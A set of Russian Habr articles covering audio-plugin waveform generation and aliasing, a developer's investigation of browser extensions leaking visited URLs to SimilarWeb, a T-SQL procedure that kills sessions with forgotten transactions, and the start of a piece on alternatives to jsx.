* Когда `mPhase` равно `0`, выражение `1.0 - (2.0 * mPhase / twoPI)` равно `1`. Пока `mPhase` возрастает, значение этого выражения падает и, как только достигает `-1`, подскакивает до `1`.
Ну вот, у нас есть нисходящая («левая») пила!
Условие `while`, казалось бы, избыточно — оно будет встречаться в каждом `case`. Но если сделать иначе, тогда придется включить `switch` в цикл. Так мы даже избавимся от избыточного `for`, но тогда `switch` будет выполняться чаще, чем необходимо.
Часто в программировании мы предпочитаем лаконичность и читаемость кода производительности. Но DSP код, который выполняется 44100 (или даже 96000) раз в секунду может быть и исключением из этого правила. Помимо этого, не забывайте, что компилятор оптимизирует много всего без вашего ведома, и то, что может казаться «кучей работы» для программиста может быть элементарной вещью в сравнении с теми процессами, о которых вы даже не задумываетесь.
Следующий в очереди — меандр:
```
case OSCILLATOR_MODE_SQUARE:
for (int i = 0; i < nFrames; i++) {
if (mPhase <= mPI) {
buffer[i] = 1.0;
} else {
buffer[i] = -1.0;
}
mPhase += mPhaseIncrement;
while (mPhase >= twoPI) {
mPhase -= twoPI;
}
}
break;
```
Вторая половина этого кода вам уже известна. Каждый цикл длиной в `twoPI`. Тело условного оператора `if` устанавливает первую половину цикла равной `1`, вторую `-1`. Когда `mPhase` становится больше `mPI`, в форме волны появляется резкий скачок. Так выглядит меандр.
Треугольник немного сложнее:
```
case OSCILLATOR_MODE_TRIANGLE:
for (int i = 0; i < nFrames; i++) {
double value = -1.0 + (2.0 * mPhase / twoPI);
buffer[i] = 2.0 * (fabs(value) - 0.5);
mPhase += mPhaseIncrement;
while (mPhase >= twoPI) {
mPhase -= twoPI;
}
}
break;
```
Если вы разберете по частям `-1.0 + (2.0 * mPhase / twoPI)`, как я это сделал раньше, то увидите, что это противоположность пиле. Абсолютное значение (`fabs`) восходящей пилы означает, что все значения ниже 0 будут инвертированы (перевернуты относительно оси x).
Значит, результирующее значение будет сначала возрастать, а потом убывать. Вычитание `0.5` выравнивает форму волны относительно нуля. Умножение на `2.0` масштабирует значение, и оно меняется от `-1` до `1`. Вот и треугольник.
Давайте уже используем наш осциллятор! Включите *Oscillator.h* и добавьте член `Oscillator` в класс `Synthesis`:
```
// ...
#include "Oscillator.h"
class Synthesis : public IPlug
{
// ...
private:
double mFrequency;
void CreatePresets();
Oscillator mOscillator;
};
```
Также нам надо переименовать `mThreshold` в `mFrequency`.
Теперь поменяйте параметры инициализации в конструкторе:
```
GetParam(kFrequency)->InitDouble("Frequency", 440.0, 50.0, 20000.0, 0.01, "Hz");
GetParam(kFrequency)->SetShape(2.0);
```
Покрутим ручку, протестируем класс. Будем менять частоту осциллятора от 50 Гц до 20 кГц (по умолчанию поставим 440).
Измените функцию `createPresets`:
```
void Synthesis::CreatePresets() {
MakePreset("clean", 440.0);
}
```
Нам нужно передать осциллятору, какая частота семплирования сейчас используется. Это надо сделать в функции `Reset`:
```
void Synthesis::Reset()
{
TRACE;
IMutexLock lock(this);
mOscillator.setSampleRate(GetSampleRate());
}
```
Если мы этого не сделаем и у осциллятора будет неверно задана частота семплирования, он будет генерировать те же формы волны, но частоты будут неправильными, т. к. будет вычислено неправильное приращение фазы. Функция-член `GetSampleRate` наследуется из класса `IPlugBase`.
`OnParamChange` тоже надо отредактировать, чтобы можно было менять частоту ручкой:
```
void Synthesis::OnParamChange(int paramIdx)
{
IMutexLock lock(this);
switch (paramIdx)
{
case kFrequency:
mOscillator.setFrequency(GetParam(kFrequency)->Value());
break;
default:
break;
}
}
```
Ну и наконец, надо использовать осциллятор в `ProcessDoubleReplacing`:
```
void Synthesis::ProcessDoubleReplacing(double** inputs,
double** outputs,
int nFrames) {
// Mutex is already locked for us.
double *leftOutput = outputs[0];
double *rightOutput = outputs[1];
mOscillator.generate(leftOutput, nFrames);
// Copy left buffer into right buffer:
for (int s = 0; s < nFrames; ++s) {
rightOutput[s] = leftOutput[s];
}
}
```
По сути `mOscillator` заполняет буфер левого канала, и мы просто копируем эти значения в буфер правого.
Давайте послушаем, как это звучит! Запускайте. Если в Xcode вылетают ошибки линкера, проверьте, добавили ли вы *Oscillator.cpp* в *Compile Sources*. Когда наша поделка запустится, будет слышен ровный тон. Покрутите ручку, и частота должна меняться.
Теперь поменяйте `mOscillatorMode` в *Oscillator.h* на этапе инициализации в конструкторе:
```
Oscillator() :
mOscillatorMode(OSCILLATOR_MODE_SAW),
mPI(2*acos(0.0)),
mFrequency(440.0),
mPhase(0.0),
mSampleRate(44100.0) { updateIncrement(); };
```
Перезапустите код, и теперь будет более резкий звук. Поиграйтесь с `OSCILLATOR_MODE_SQUARE` и `OSCILLATOR_MODE_TRIANGLE`, у них разные тембры.
Со всеми формами волны, кроме синуса, можно заметить, что на высоких частотах появляются странные шумы. Появляются дополнительные тоны даже ниже основной частоты. Они звучат негармонично, и когда крутишь ручку вверх и вниз, эти тоны смещаются в противоположных направлениях о\_О
Алиасинг
--------
Как мы уже видели в коде меандра, когда фаза возрастает до значения большего, чем два пи, в форме волны возникает мгновенный скачок от положительного максимума в текущем семпле до отрицательного в следующем. Противоположный скачок возникает, когда из `mPhase` вычитается `twoPI` и значение выражения снова становится меньше `mPI`. Основная идея в том, что резкие скачки сигнала означают, что в нем содержится много высокочастотных компонент.
Представьте себе, что вас попросили собрать этот скачок, используя только синусоидальные волны. Учитывая, что они гладкие, вам понадобится множество высокочастотных синусов. Вообще для создания идеального скачка теоретически понадобится бесконечное количество высокочастотных компонент, каждая со все большей частотой. Вот то же самое происходит при генерации меандра, пилы и треугольника.
Но в вычислительной технике все — конечное. Оперативная память и жесткий диск имеют конечный объем, так что для записи одной секунды звука компьютер может использовать только конечное количество значений, чтобы сохранить эту секунду. Это число (частота семплирования) может быть любым, но стандартами являются 44100, 48000 и 96000 семплов в секунду. Реже используются 176400 и 192000. Сигнал, представленный конечным количеством семплов, называется дискретным.
Чтобы описать сигнал, скачущий между -1 и 1, понадобится как минимум два семпла на цикл: один для -1, другой для 1. Значит, если семплировать с частотой 44100 раз в секунду, самой высокой корректно записанной частотой будет 22050 Гц (почитайте про [частоту Найквиста](http://ru.wikipedia.org/wiki/%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%B0_%D0%9D%D0%B0%D0%B9%D0%BA%D0%B2%D0%B8%D1%81%D1%82%D0%B0))
Так что дискретным сигналом описать идеальный меандр, пилу или треугольник невозможно. Если мы все же будем пытаться это делать, то очень скоро столкнемся с эффектом [алиасинга](https://ru.wikipedia.org/wiki/%D0%90%D0%BB%D0%B8%D0%B0%D1%81%D0%B8%D0%BD%D0%B3). Подробнее можно почитать [здесь](http://www.dspguide.com/ch3/2.htm).
Так как же мы можем сгенерировать самую лучшую форму волны для заданной частоты дискретизации без эффектов алиасинга? *«Самая лучшая»* в данном случае означает *«самая близкая к той, которую мы описали выше»*. Частота Найквиста — это некоторое ограничение в частотном диапазоне. Это ограничение означает не то, что сигнал не должен иметь пиков круче X, а то, что *в сигнале не должно присутствовать частот выше X Гц*. Так что нам надо переключиться в частотное представление сигнала для решения подобных задач. Мы сделаем это немного позже, а пока что — в следующем посте — нам предстоит разобраться, как читать MIDI.
Код из этого поста можно скачать [здесь](http://martin-finke.de/blog/articles/audio-plugins-008-synthesizing-waveforms/source.zip).
Оригинал статьи:
[martin-finke.de/blog/articles/audio-plugins-008-synthesizing-waveforms](http://martin-finke.de/blog/articles/audio-plugins-008-synthesizing-waveforms/) | https://habr.com/ru/post/226439/ | null | ru | null |
# Как мы искали утечку данных в SimilarWeb
Доброго времени суток.
Все началось пол года назад. Работаем небольшой командой над проектом, проект уже запустили в сеть и он успешно работал несколько месяцев. Зашла как-то речь по поводу статистики посещения, источников переходов пользователей и тому подобное. Менеджеры прислали мне ссылку на страницу SimilarWeb с нашим ресурсом. То что я увидел, меня сильно озадачило. Помимо прочей информации, на странице есть информация о поддоменах, которые SimilarWeb нашел. Представьте себе мое удивление, когда я увидел в топ-5 поддоменах внутренние, которые используются только сотрудниками и недоступны извне (такие как jira.mycomp.org, ci.mycomp.org, git.mycomp.org).
На ум приходило только одно: у кого-то в команде стоит какая-то гадость, которая сливает данные по посещаемым URL. Часть команды работает удаленно, у всех разные операционные системы и браузеры. С каждым общался индивидуально, просил просканировать систему антивирусом, запрашивал список используемых расширений.
Гугление выдало несколько статей по поводу покупки компанией SimilarWeb расширения Stylish. Я поставил данное приложение к себе и убедился, что оно действительно сливает данные. Как это работает: при установки расширения, вы соглашаетесь с условиями сбора данных (причем на текущий момент приложение находится в магазине и не скрывает того, что данные будут собираться для SimilarWeb). Далее при переходе на любую страницу (даже на https), расширение в фоне начинает отправлять данные на url h\_\_\_s://userstylesapi.com/tic/stats. Выглядит это так:

Параметр **e** в **FormData** содержит дважды завернутые в Base64 данные:
```
ZG0xMFBUTW1iR0YyUFRJeEpuZDJQVEVtWjNJOU1pNHdMamttY0hobFBURm5aamhwTjJnNU5qVTVOekZ4ZERob05tTTVhamc0T0hCME5DWnpiblU5Sm1kd1BXaDBkSEJ6SlROQkpUSkdKVEpHZFhObGNuTjBlV3hsY3k1dmNtY2xNa1p6ZEhsc1pYTWxNa1ppY205M2MyVWxNa1p1WlhkbGMzUXRjM1I1YkdWekptTm9QVGttWkdrOVlUTmxNMlV5WVRneA==
vmt=3&lav=21&wv=1&gr=2.0.9&pxe=1gf8i7h965971qt8h6c9j888pt4&snu=&gp=https%3A%2F%2Fuserstyles.org%2Fstyles%2Fbrowse%2Fnewest-styles&ch=9&di=a3e3e2a81
```
Таким образом при каждом клике передается информация по посещаемым URL.
Провели чистку рабочих и домашних компьютеров, удалил расширение у тех у кого оно было и написали в инструкцию на будущее. Дальше оставалось только ждать. Данные для SimilarWeb обновляются в течении одного месяца.
Однако, прошло два месяца, а ситуация не изменилась. Домены продолжали висеть в списке ресурса. Значит вычистили не все. Решили вычислить «доносчика» другим способом. Для каждого члена команды был создан специальный URL следующего вида: coder-124.mycomp.ru, coder-523.mycomp.ru и т.д. Дали задачу заходить на данный URL ежедневно и делать несколько кликов, процесс поставили на мониторинг, чтобы никто не забывал. После месяца издевательства над разработчиками мы все же получили плоды. Один из URL оказался в самом низу списка. Цель обнаружена, осталось понять каким образом данные сливаются.
Результат удивил, данные сливает расширение Chrome… Но не Stylish… Как оказалось, данные сливает расширение [Frigate](https://fri-gate.org/ru/). При установки расширение показывает следующее сообщение:

Допустим… Далее мы посмотрели каким образом оно передает эти данные:


При переходе на любую страницу на два URL (интересно, почему на два) отправляются следующие данные:

Параметр **e** в **FormData** содержит дважды завернутые в Base64 данные:
```
Y3oweE9ERTBKbTFrUFRJeEpuQnBaRDFzWW5keE1FeHBTVW8xZFhFeWFEY21jMlZ6Y3owMU56TXpNVFl6TWpVeU1EazJOemd3TURBbWMzVmlQV05vY205dFpTWnhQV2gwZEhCekpUTkJMeTltY21rdFoyRjBaUzV2Y21jdmNuVXZKbWh5WldabGNtVnlQV2gwZEhCekpUTkJMeTkzZDNjdVoyOXZaMnhsTG5KMUx5WndjbVYyUFdoMGRIQnpKVE5CTHk5bWNta3RaMkYwWlM1dmNtY3ZjblV2Sm5SdGRqMDBNREUxSm5SdFpqMHhMakU9
s=1814&md=21&pid=lbwq0LiIJ5uq2h7&sess=573316325209678000⊂=chrome&q=https%3A//fri-gate.org/ru/&hreferer=https%3A//www.google.ru/&prev=https%3A//fri-gate.org/ru/&tmv=4015&tmf=1.1
```
Я не думаю, что все эти данные нужны для подбора прокси сервера. Да и механизмы очень похожи.
Кстати, в расширении friGate Light такого функционала нет…
Вместо заключения.
Могу предположить, что если нашлось второе расширение, то найдется и третье, и четвертое. Скорее всего данный способ сотрудничества SimilarWeb с разработчиками браузерных расширений будет развиваться дальше. Призываю вас проверить свои расширения (Chrome, Firefox — не важно) и если найдете подобное, пишите в комментариях. Интересно знать, как глубока проблема.
И помните, большой брат всегда наблюдает за вами :)
Всех благ. | https://habr.com/ru/post/444770/ | null | ru | null |
# Автоматизация удаления забытых транзакций
### Предисловие
Достаточно нередко бывают ситуации, когда транзакция в MS SQL Server бывает забытой тем, кто ее запустил. Самый частый пример этому — запуск скрипта в SSMS, где явно открывается транзакция инструкцией begin tran, затем происходит ошибка, а вот commit или rollback tran не происходит, а инициатор запуска благополучно отошел надолго от этого запроса. В результате с течением времени возникает все больше флуктуации в плане блокировок на запросы, которые запрашивают доступ к заблокированным ресурсам (таблицам, ресурсам сервера (ОЗУ, ЦП, система ввода-вывода).
В данной статье будет разобран пример автоматизации удаления забытых транзакций.
### Решение
Под забытой транзакцией будем понимать ту активную (запущенную) транзакцию, в которой на протяжении какого-то достаточно большого промежутка времени T нет активных (выполняемых) запросов.
Сначала приведем общий алгоритм по удалению таких транзакций:
1. Создаем таблицу для хранения и анализа информации по текущим забытым транзакциям, а также таблицу для архивации по действиям удаления выбранных из первой таблицы транзакций для последующего разбора
2. Собираем информацию (транзакции и их сессии, у которых нет запросов, т е транзакции запущенные и забытые в течении определенного времени T)
3. Обновляем таблицу текущих забытых транзакций из п.1 (если у забытой транзакции появился активный запрос, то такая транзакция становится незабытой и удаляется из первой таблицы п.1)
4. Собираем те сессии, которые нужно убить (у сессии есть хотя бы одна транзакция, которая попала определенное кол-во раз K как забытая в таблицу из п.1 и столько же раз у самой сессии нет активных запросов)
5. Архивируем что собираемся удалить (детальная информация про удаляемые сессии, подключения и транзакции)
6. Удаляем выбранные сессии
7. Удаляем обработанные записи, а также те, что невозможно удалить и они находятся слишком долго в таблице п.1
Далее приведем пример реализации данного выше алгоритма.
Создадим таблицу для хранения и анализа информации по текущим забытым транзакциям следующим образом:
**Таблица попадания транзакций как забытых с их сессиями**
```
USE [ИМЯ_БД]
GO
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [srv].[SessionTran](
[SessionID] [int] NOT NULL,
[TransactionID] [bigint] NOT NULL,
[CountTranNotRequest] [tinyint] NOT NULL,
[CountSessionNotRequest] [tinyint] NOT NULL,
[TransactionBeginTime] [datetime] NOT NULL,
[InsertUTCDate] [datetime] NOT NULL,
[UpdateUTCDate] [datetime] NOT NULL,
CONSTRAINT [PK_SessionTran] PRIMARY KEY CLUSTERED
(
[SessionID] ASC,
[TransactionID] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]
GO
ALTER TABLE [srv].[SessionTran] ADD CONSTRAINT [DF_SessionTran_Count] DEFAULT ((0)) FOR [CountTranNotRequest]
GO
ALTER TABLE [srv].[SessionTran] ADD CONSTRAINT [DF_SessionTran_CountSessionNotRequest] DEFAULT ((0)) FOR [CountSessionNotRequest]
GO
ALTER TABLE [srv].[SessionTran] ADD CONSTRAINT [DF_SessionTran_InsertUTCDate] DEFAULT (getutcdate()) FOR [InsertUTCDate]
GO
ALTER TABLE [srv].[SessionTran] ADD CONSTRAINT [DF_SessionTran_UpdateUTCDate] DEFAULT (getutcdate()) FOR [UpdateUTCDate]
GO
```
Здесь:
1) SessionID — идентификатор сессии
2) TransactionID — идентификатор забытой транзакции
3) CountTranNotRequest — кол-во раз зафиксированного факта о том, что транзакция была забытой
4) CountSessionNotRequest — кол-во раз зафиксированного факта о том, что сессия была без активных запросов и содержала забытую транзакцию
5) TransactionBeginTime — дата и время начала забытой транзакции
6) InsertUTCDate — дата и время создания записи в UTC
7) UpdateUTCDate — дата и время изменения записи в UTC
Создадим таблицу для архивации по действиям удаления выбранных из первой таблицы транзакций для последующего разбора:
**Таблица для архивации удаленных сессий по забытым транзакциям**
```
USE [ИМЯ_БД]
GO
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [srv].[KillSession](
[ID] [int] IDENTITY(1,1) NOT NULL,
[session_id] [smallint] NOT NULL,
[transaction_id] [bigint] NOT NULL,
[login_time] [datetime] NOT NULL,
[host_name] [nvarchar](128) NULL,
[program_name] [nvarchar](128) NULL,
[host_process_id] [int] NULL,
[client_version] [int] NULL,
[client_interface_name] [nvarchar](32) NULL,
[security_id] [varbinary](85) NOT NULL,
[login_name] [nvarchar](128) NOT NULL,
[nt_domain] [nvarchar](128) NULL,
[nt_user_name] [nvarchar](128) NULL,
[status] [nvarchar](30) NOT NULL,
[context_info] [varbinary](128) NULL,
[cpu_time] [int] NOT NULL,
[memory_usage] [int] NOT NULL,
[total_scheduled_time] [int] NOT NULL,
[total_elapsed_time] [int] NOT NULL,
[endpoint_id] [int] NOT NULL,
[last_request_start_time] [datetime] NOT NULL,
[last_request_end_time] [datetime] NULL,
[reads] [bigint] NOT NULL,
[writes] [bigint] NOT NULL,
[logical_reads] [bigint] NOT NULL,
[is_user_process] [bit] NOT NULL,
[text_size] [int] NOT NULL,
[language] [nvarchar](128) NULL,
[date_format] [nvarchar](3) NULL,
[date_first] [smallint] NOT NULL,
[quoted_identifier] [bit] NOT NULL,
[arithabort] [bit] NOT NULL,
[ansi_null_dflt_on] [bit] NOT NULL,
[ansi_defaults] [bit] NOT NULL,
[ansi_warnings] [bit] NOT NULL,
[ansi_padding] [bit] NOT NULL,
[ansi_nulls] [bit] NOT NULL,
[concat_null_yields_null] [bit] NOT NULL,
[transaction_isolation_level] [smallint] NOT NULL,
[lock_timeout] [int] NOT NULL,
[deadlock_priority] [int] NOT NULL,
[row_count] [bigint] NOT NULL,
[prev_error] [int] NOT NULL,
[original_security_id] [varbinary](85) NOT NULL,
[original_login_name] [nvarchar](128) NOT NULL,
[last_successful_logon] [datetime] NULL,
[last_unsuccessful_logon] [datetime] NULL,
[unsuccessful_logons] [bigint] NULL,
[group_id] [int] NOT NULL,
[database_id] [smallint] NOT NULL,
[authenticating_database_id] [int] NULL,
[open_transaction_count] [int] NOT NULL,
[most_recent_session_id] [int] NULL,
[connect_time] [datetime] NULL,
[net_transport] [nvarchar](40) NULL,
[protocol_type] [nvarchar](40) NULL,
[protocol_version] [int] NULL,
[encrypt_option] [nvarchar](40) NULL,
[auth_scheme] [nvarchar](40) NULL,
[node_affinity] [smallint] NULL,
[num_reads] [int] NULL,
[num_writes] [int] NULL,
[last_read] [datetime] NULL,
[last_write] [datetime] NULL,
[net_packet_size] [int] NULL,
[client_net_address] [nvarchar](48) NULL,
[client_tcp_port] [int] NULL,
[local_net_address] [nvarchar](48) NULL,
[local_tcp_port] [int] NULL,
[connection_id] [uniqueidentifier] NULL,
[parent_connection_id] [uniqueidentifier] NULL,
[most_recent_sql_handle] [varbinary](64) NULL,
[LastTSQL] [nvarchar](max) NULL,
[transaction_begin_time] [datetime] NOT NULL,
[CountTranNotRequest] [tinyint] NOT NULL,
[CountSessionNotRequest] [tinyint] NOT NULL,
[InsertUTCDate] [datetime] NOT NULL,
CONSTRAINT [PK_KillSession] PRIMARY KEY CLUSTERED
(
[ID] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]
GO
ALTER TABLE [srv].[KillSession] ADD CONSTRAINT [DF_KillSession_InsertUTCDate] DEFAULT (getutcdate()) FOR [InsertUTCDate]
GO
```
Здесь все поля из системных представлений [sys.dm\_exec\_sessions](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-exec-sessions-transact-sql) и [sys.dm\_exec\_connections](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-exec-connections-transact-sql), а InsertUTCDate — дата и время создания записи в UTC.
Далее, для реализации оставшихся пунктов реализуем хранимую процедуру [srv].[AutoKillSessionTranBegin] следующим образом:
**Реализация хранимой процедуры [srv].[AutoKillSessionTranBegin]**
```
USE [ИМЯ_БД]
GO
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [srv].[AutoKillSessionTranBegin]
@minuteOld int, --старость запущенной транзакции (T мин)
@countIsNotRequests int --кол-во попаданий в таблицу (K)
AS
BEGIN
SET NOCOUNT ON;
SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED;
declare @tbl table (
SessionID int,
TransactionID bigint,
IsSessionNotRequest bit,
TransactionBeginTime datetime
);
--собираем информацию (транзакции и их сессии, у которых нет запросов, т е транзакции запущенные и забытые)
insert into @tbl (
SessionID,
TransactionID,
IsSessionNotRequest,
TransactionBeginTime
)
select t.[session_id] as SessionID
, t.[transaction_id] as TransactionID
, case when exists(select top(1) 1 from sys.dm_exec_requests as r where r.[session_id]=t.[session_id]) then 0 else 1 end as IsSessionNotRequest
, (select top(1) ta.[transaction_begin_time] from sys.dm_tran_active_transactions as ta where ta.[transaction_id]=t.[transaction_id]) as TransactionBeginTime
from sys.dm_tran_session_transactions as t
where t.[is_user_transaction]=1
and not exists(select top(1) 1 from sys.dm_exec_requests as r where r.[transaction_id]=t.[transaction_id]);
--обновляем таблицу запущенных транзакций, у которых нет активных запросов
;merge srv.SessionTran as st
using @tbl as t
on st.[SessionID]=t.[SessionID] and st.[TransactionID]=t.[TransactionID]
when matched then
update set [UpdateUTCDate] = getUTCDate()
, [CountTranNotRequest] = st.[CountTranNotRequest]+1
, [CountSessionNotRequest] = case when (t.[IsSessionNotRequest]=1) then (st.[CountSessionNotRequest]+1) else 0 end
, [TransactionBeginTime] = t.[TransactionBeginTime]
when not matched by target then
insert (
[SessionID]
,[TransactionID]
,[TransactionBeginTime]
)
values (
t.[SessionID]
,t.[TransactionID]
,t.[TransactionBeginTime]
)
when not matched by source then delete;
--список сессий для удаления (содержащие забытые транзакции)
declare @kills table (
SessionID int
);
--детальная информация для архива
declare @kills_copy table (
SessionID int,
TransactionID bigint,
CountTranNotRequest tinyint,
CountSessionNotRequest tinyint,
TransactionBeginTime datetime
)
--собираем те сессии, которые нужно убить
--у сессии есть хотя бы одна транзакция, которая попала @countIsNotRequests раз как без активных запросов и столько же раз у самой сессии нет активных запросов
insert into @kills_copy (
SessionID,
TransactionID,
CountTranNotRequest,
CountSessionNotRequest,
TransactionBeginTime
)
select SessionID,
TransactionID,
CountTranNotRequest,
CountSessionNotRequest,
TransactionBeginTime
from srv.SessionTran
where [CountTranNotRequest]>=@countIsNotRequests
and [CountSessionNotRequest]>=@countIsNotRequests
and [TransactionBeginTime]<=DateAdd(minute,-@minuteOld,GetDate());
--архивируем что собираемся удалить (детальная информация про удаляемые сессии, подключения и транзакции)
INSERT INTO [srv].[KillSession]
([session_id]
,[transaction_id]
,[login_time]
,[host_name]
,[program_name]
,[host_process_id]
,[client_version]
,[client_interface_name]
,[security_id]
,[login_name]
,[nt_domain]
,[nt_user_name]
,[status]
,[context_info]
,[cpu_time]
,[memory_usage]
,[total_scheduled_time]
,[total_elapsed_time]
,[endpoint_id]
,[last_request_start_time]
,[last_request_end_time]
,[reads]
,[writes]
,[logical_reads]
,[is_user_process]
,[text_size]
,[language]
,[date_format]
,[date_first]
,[quoted_identifier]
,[arithabort]
,[ansi_null_dflt_on]
,[ansi_defaults]
,[ansi_warnings]
,[ansi_padding]
,[ansi_nulls]
,[concat_null_yields_null]
,[transaction_isolation_level]
,[lock_timeout]
,[deadlock_priority]
,[row_count]
,[prev_error]
,[original_security_id]
,[original_login_name]
,[last_successful_logon]
,[last_unsuccessful_logon]
,[unsuccessful_logons]
,[group_id]
,[database_id]
,[authenticating_database_id]
,[open_transaction_count]
,[most_recent_session_id]
,[connect_time]
,[net_transport]
,[protocol_type]
,[protocol_version]
,[encrypt_option]
,[auth_scheme]
,[node_affinity]
,[num_reads]
,[num_writes]
,[last_read]
,[last_write]
,[net_packet_size]
,[client_net_address]
,[client_tcp_port]
,[local_net_address]
,[local_tcp_port]
,[connection_id]
,[parent_connection_id]
,[most_recent_sql_handle]
,[LastTSQL]
,[transaction_begin_time]
,[CountTranNotRequest]
,[CountSessionNotRequest])
select ES.[session_id]
,kc.[TransactionID]
,ES.[login_time]
,ES.[host_name]
,ES.[program_name]
,ES.[host_process_id]
,ES.[client_version]
,ES.[client_interface_name]
,ES.[security_id]
,ES.[login_name]
,ES.[nt_domain]
,ES.[nt_user_name]
,ES.[status]
,ES.[context_info]
,ES.[cpu_time]
,ES.[memory_usage]
,ES.[total_scheduled_time]
,ES.[total_elapsed_time]
,ES.[endpoint_id]
,ES.[last_request_start_time]
,ES.[last_request_end_time]
,ES.[reads]
,ES.[writes]
,ES.[logical_reads]
,ES.[is_user_process]
,ES.[text_size]
,ES.[language]
,ES.[date_format]
,ES.[date_first]
,ES.[quoted_identifier]
,ES.[arithabort]
,ES.[ansi_null_dflt_on]
,ES.[ansi_defaults]
,ES.[ansi_warnings]
,ES.[ansi_padding]
,ES.[ansi_nulls]
,ES.[concat_null_yields_null]
,ES.[transaction_isolation_level]
,ES.[lock_timeout]
,ES.[deadlock_priority]
,ES.[row_count]
,ES.[prev_error]
,ES.[original_security_id]
,ES.[original_login_name]
,ES.[last_successful_logon]
,ES.[last_unsuccessful_logon]
,ES.[unsuccessful_logons]
,ES.[group_id]
,ES.[database_id]
,ES.[authenticating_database_id]
,ES.[open_transaction_count]
,EC.[most_recent_session_id]
,EC.[connect_time]
,EC.[net_transport]
,EC.[protocol_type]
,EC.[protocol_version]
,EC.[encrypt_option]
,EC.[auth_scheme]
,EC.[node_affinity]
,EC.[num_reads]
,EC.[num_writes]
,EC.[last_read]
,EC.[last_write]
,EC.[net_packet_size]
,EC.[client_net_address]
,EC.[client_tcp_port]
,EC.[local_net_address]
,EC.[local_tcp_port]
,EC.[connection_id]
,EC.[parent_connection_id]
,EC.[most_recent_sql_handle]
,(select top(1) text from sys.dm_exec_sql_text(EC.[most_recent_sql_handle])) as [LastTSQL]
,kc.[TransactionBeginTime]
,kc.[CountTranNotRequest]
,kc.[CountSessionNotRequest]
from @kills_copy as kc
inner join sys.dm_exec_sessions ES with(readuncommitted) on kc.[SessionID]=ES.[session_id]
inner join sys.dm_exec_connections EC with(readuncommitted) on EC.session_id = ES.session_id;
--собираем сессии
insert into @kills (
SessionID
)
select [SessionID]
from @kills_copy
group by [SessionID];
declare @SessionID int;
--непосредственное удаление выбранных сессий
while(exists(select top(1) 1 from @kills))
begin
select top(1)
@SessionID=[SessionID]
from @kills;
BEGIN TRY
EXEC sp_executesql N'kill @SessionID',
N'@SessionID INT',
@SessionID;
END TRY
BEGIN CATCH
END CATCH
delete from @kills
where [SessionID]=@SessionID;
end
select st.[SessionID]
,st.[TransactionID]
into #tbl
from srv.SessionTran as st
where st.[CountTranNotRequest]>=250
or st.[CountSessionNotRequest]>=250
or exists(select top(1) 1 from @kills_copy kc where kc.[SessionID]=st.[SessionID]);
--удаление обработанных записей, а также те, что невозможно удалить и они находятся слишком долго в таблице на рассмотрение
delete from st
from #tbl as t
inner join srv.SessionTran as st on t.[SessionID] =st.[SessionID]
and t.[TransactionID]=st.[TransactionID];
drop table #tbl;
END
GO
```
Здесь п.7 алгоритма реализован по достижению одного из счетчиков CountTranNotRequest или CountSessionNotRequest значения 250.
### Результат
В данной статье был рассмотрен пример реализации автоматизированного удаления забытых транзакций.
Данный метод позволяет автоматизировать процесс удаления забытых транзакций, результатом которого является пресечение попыток возрастания флуктуации в плане блокировок, исходящие от таких транзакций. В итоге достигается защита производительности СУБД от таких действий инициаторов по запуску транзакций, которые в будущем могут стать забытыми.
### Источники:
» [sys.dm\_exec\_requests](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-exec-requests-transact-sql)
» [sys.dm\_tran\_active\_transactions](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-tran-active-transactions-transact-sql)
» [sys.dm\_tran\_session\_transactions](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-tran-session-transactions-transact-sql)
» [sys.dm\_exec\_sql\_text](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-exec-sql-text-transact-sql)
» [sys.dm\_exec\_sessions](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-exec-sessions-transact-sql)
» [sys.dm\_exec\_connections](https://docs.microsoft.com/ru-ru/sql/relational-databases/system-dynamic-management-views/sys-dm-exec-connections-transact-sql)
» [KILL](https://docs.microsoft.com/ru-ru/sql/t-sql/language-elements/kill-transact-sql) | https://habr.com/ru/post/349798/ | null | ru | null |
# Можно ли обойтись без jsx и зачем?
Я уверен, большинство из вас, кто использует **react** используют **jsx**. Благодаря своему лаконичному синтаксису **jsx** улучшает читабельность шаблонов. Сравните:
```
render() {
return React.createElement('div', { className: 'block'}, 'Text of block');
}
// vs
render() {
return
Text of block
;
}
```
Второй вариант даже в таком простом примере выглядит намного понятнее. Если усложнить пример, то разница будет еще очевиднее.
Чем плох jsx
------------
Все бы хорошо, если бы **jsx** был бы стандартной возможностью javascript, но это не так. Для работы с **jsx** вам потребуется транспилятор. Решив использовать **jsx** вы навечно становитесь зависимы от транспиляции. Еще недавно, такая зависимость никого не пугала, так как для использования новых возможностей из ecmascript 2015 вам в любом случае необходим транспилятор. Но все меняется, уровень поддержки es6 [близок к 100%](http://kangax.github.io/compat-table/es6/)
По крайней мере, в develop-окружении уже можно избавляться от транспиляции. Представляете, какие возможности это открывает? Не нужно при дебаге ковыряться в выходе babel, который многое изменил, не нужны source map, после изменения файла нет необходимости ждать, пока закончится пересборка. И **jsx** в данном случае будет главной помехой… Есть ли альтернативы **jsx**?
Альтернативы jsx
----------------
Стандарт ecmascript 2015 определяет [тегированные шаблонные строки](https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/template_strings). Пример, выше можно переписать так:
